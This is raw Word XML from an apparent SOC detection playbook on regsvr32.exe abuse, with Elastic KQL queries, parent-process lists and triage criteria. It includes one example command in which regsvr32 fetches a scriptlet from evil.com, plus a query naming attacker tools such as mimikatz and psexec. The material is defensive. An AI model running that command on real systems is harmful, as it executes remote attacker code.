          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA21D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>True positive indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E9469C" w14:textId="77777777" w:rsidR="00FA21D4" w:rsidRPr="00FA21D4" w:rsidRDefault="0071548A" w:rsidP="00FA21D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A2E44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>File appears as document/image but executes as code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EC1DA5" w14:textId="77961C4E" w:rsidR="0071548A" w:rsidRDefault="009525E4" w:rsidP="00E14040">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14040">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">No </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E14040">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E14040">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> or file signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B50A2F3" w14:textId="3DE7732B" w:rsidR="00D23508" w:rsidRDefault="00E14040" w:rsidP="00D23508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dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1464BBBE" w14:textId="77777777" w:rsidR="00D23508" w:rsidRPr="00D23508" w:rsidRDefault="00D23508" w:rsidP="00D23508">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A3A235F" w14:textId="08EE7ADE" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="00CF68B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.5 R</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3CDE">
        <w:t>egsvr32 Network Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536BEAF2" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:left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6E213448" w14:textId="40064458" w:rsidR="0071548A" w:rsidRPr="007C502C" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00085ED9">
        <w:t xml:space="preserve">Any regsvr32.exe process that opens </w:t>
      </w:r>
      <w:r w:rsidR="001315D4">
        <w:t xml:space="preserve">network connection </w:t>
      </w:r>
      <w:r w:rsidRPr="00085ED9">
        <w:t xml:space="preserve">to an </w:t>
      </w:r>
      <w:r w:rsidRPr="007C502C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>external IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF9D5A" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00D83FEA" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C502C">
        <w:t>regsvr32.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C502C">
        <w:t>i:http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C502C">
        <w:t>://evil.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C502C">
        <w:t>file.sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C502C">
        <w:t xml:space="preserve"> scrobj.dll (This triggers a network event).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA44E73" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00D83FEA" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6279EE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2.5.1 Query KQL Elastic XDR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs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38F9B30C" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65EC655E" w14:textId="484C961D" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076213B">
              <w:t xml:space="preserve">process.name: regsvr32.exe AND </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0076213B">
              <w:t>event.category</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0076213B">
              <w:t>: networ</w:t>
            </w:r>
            <w:r>
              <w:t>k</w:t>
            </w:r>
            <w:r w:rsidR="00F75D0C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0076213B">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48BBF299" w14:textId="31EB6BE0" w:rsidR="009C5644" w:rsidRDefault="0071548A" w:rsidP="009C5644">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query Link:</w:t>
      </w:r>
      <w:r w:rsidR="00875E9E" w:rsidRPr="00875E9E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="1D2A3E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F9FC"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="009C5644" w:rsidRPr="007C7830">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://portal.cybersoc.my/app/r/s/5ZAsu</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BBB6C2B" w14:textId="7464591F" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="009C5644">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.5.2 </w:t>
      </w:r>
      <w:r w:rsidR="00644033">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20318969" w14:textId="3A12BB44" w:rsidR="0071548A" w:rsidRPr="000917FC" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000917FC">
        <w:t>Review destination I</w:t>
      </w:r>
      <w:r w:rsidR="00FB61A8" w:rsidRPr="000917FC">
        <w:t>P</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2771482E" w14:textId="2697A183" w:rsidR="0071548A" w:rsidRPr="002025FB" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002025FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Check timing: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E83FDE">
        <w:t xml:space="preserve">network activity </w:t>
      </w:r>
      <w:r w:rsidR="00A45096" w:rsidRPr="00E83FDE">
        <w:t>immediately</w:t>
      </w:r>
      <w:r w:rsidR="00A45096" w:rsidRPr="0035577E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B15509">
        <w:t>occur</w:t>
      </w:r>
      <w:r w:rsidR="00A90F84">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A90F84" w:rsidRPr="0035577E">
        <w:t xml:space="preserve">(5 </w:t>
      </w:r>
      <w:r w:rsidR="0049735C" w:rsidRPr="0035577E">
        <w:t>seconds)</w:t>
      </w:r>
      <w:r w:rsidR="0049735C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0049735C" w:rsidRPr="00E83FDE">
        <w:t>after</w:t>
      </w:r>
      <w:r w:rsidRPr="00E83FDE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A04C67">
        <w:t xml:space="preserve">regsvr32 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E83FDE">
        <w:t>execution</w:t>
      </w:r>
      <w:r w:rsidR="00496D37">
        <w:t xml:space="preserve"> can consider as malicious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEAC7AE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2.5.3 True positive indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFB362E" w14:textId="1D04CA17" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E4CAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>External</w:t>
      </w:r>
      <w:r w:rsidR="008671B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(malicious)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E4CAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> or unknown destinations</w:t>
      </w:r>
      <w:r w:rsidR="00A45096">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, if internal</w:t>
      </w:r>
      <w:r w:rsidR="00EA0623">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(suspicious)</w:t>
      </w:r>
      <w:r w:rsidR="00A45096">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> check user whether</w:t>
      </w:r>
      <w:r w:rsidR="008671B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> normal user</w:t>
      </w:r>
      <w:r w:rsidR="0091754C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(malicious)</w:t>
      </w:r>
      <w:r w:rsidR="008671B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> or</w:t>
      </w:r>
      <w:r w:rsidR="00A45096">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
      <w:r w:rsidR="0091754C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(suspicious)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2B6CCE" w14:textId="72EE9004" w:rsidR="00410270" w:rsidRDefault="00410270" w:rsidP="0071548A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Network </w:t>
      </w:r>
      <w:r w:rsidR="00E53403">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> occur within 5 seconds</w:t>
      </w:r>
      <w:r w:rsidR="00E96204">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(malicious), 30 seconds(suspicious) and &gt;30 seconds (Delayed network activity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6713C0B6" w14:textId="77777777" w:rsidR="00EC7418" w:rsidRPr="00EC7418" w:rsidRDefault="00EC7418" w:rsidP="00EC7418">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0765442A" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="00CF68B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7F93">
        <w:t>Suspicious Parent Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F4BC53" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:left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11E9976B" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00721908" w:rsidRDefault="0071548A" w:rsidP="0071548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Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00721908">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> launching regsvr32.exe (Macro abuse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4962A07D" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00721908" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00721908">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PowerShell/CMD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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721908">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> launching regsvr32.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00721908">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B3B339" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00721908" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73EF8D69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2.6.1 Query KQL Elastic XDR</w:t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566A75F4" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32894009" w14:textId="660C4CF8" w:rsidR="0071548A" w:rsidRPr="004364E9" w:rsidRDefault="009A3B98" w:rsidP="006B3FC4">
            <w:r w:rsidRPr="009A3B98">
              <w:t>process.name: regsvr32.exe AND (</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>process.parent.name: powershell.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: pwsh.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: cmd.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: wscript.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: cscript.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: mshta.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: rundll32.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: wmic.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: wmiprvse.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: winrs.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: wsmprovhost.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: psexec.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: psexesvc.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: paexec.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: schtasks.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: at.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: sc.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: reg.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: net.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: net1.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: winrm.cmd</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: wmiadap.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: mofcomp.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: wbemtest.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: powershell_ise.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: msbuild.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: installutil.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: regasm.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: regsvcs.exe</w:t>
            </w:r>
            <w:r w:rsidR="00520C43" w:rsidRPr="009A3B98">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: cmdkey.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: rdesktop.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: mstsc.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: mimikatz.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: procdump.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: wmiexec.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: smbexec.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: atexec.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: dcomexec.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: psremoting.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: psexec64.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: sexec.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: remote.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: agent.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: teamviewer.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: anydesk.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: screenconnect.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: splashtop.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: logmein.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: excel.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: winword.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: outlook.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: powerpnt.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: chrome.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: firefox.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: iexplore.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: msedge.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>OR process.parent.name: explorer.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3B98">
              <w:br/>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B8F8759" w14:textId="343B4DFE" w:rsidR="00766F80" w:rsidRDefault="0071548A" w:rsidP="00EC7418">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Query Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00766F80" w:rsidRPr="007C7830">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://portal.cybersoc.my/app/r/s/81qXv</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12BC51B5" w14:textId="46FBF2D5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2.6.2 Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEC8495" w14:textId="55110875" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00527E82">
        <w:t xml:space="preserve">Verify if execution followed </w:t>
      </w:r>
      <w:r w:rsidR="00700123">
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidRPr="00527E82">
        <w:t>user interaction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00527E82">
        <w:t>(opening document, clicking file)</w:t>
      </w:r>
      <w:r w:rsidRPr="00035D45">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB79F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(user.name or user.id)</w:t>
      </w:r>
      <w:r w:rsidR="00700123">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> maybe check process lineage</w:t>
      </w:r>
      <w:r w:rsidR="001700F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088F9E01" w14:textId="7E0662EF" w:rsidR="00392B91" w:rsidRDefault="00392B91" w:rsidP="0071548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Check network </w:t>
      </w:r>
      <w:r w:rsidR="00C23E35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>activity/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ED2665" w14:textId="33D03D9F" w:rsidR="00FC2DE6" w:rsidRDefault="00FC2DE6" w:rsidP="0071548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Check parent process signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5F8BD9" w14:textId="1607FF37" w:rsidR="0071548A" w:rsidRPr="00424982" w:rsidRDefault="0071548A" w:rsidP="00424982">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00424982">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>True positive indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E05F26" w14:textId="505BDF6A" w:rsidR="00C44568" w:rsidRPr="00424982" w:rsidRDefault="00C44568" w:rsidP="00424982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If user not admin confirm as malicious</w:t>
      </w:r>
      <w:r w:rsidR="00424982">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidRPr="00424982">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">f user is admin need to verify back with admin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41506FC9" w14:textId="6B65973D" w:rsidR="00392B91" w:rsidRDefault="006A76C3" w:rsidP="00C44568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Presence of network </w:t>
      </w:r>
      <w:r w:rsidR="008D2D17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>connections</w:t>
      </w:r>
    </w:p>
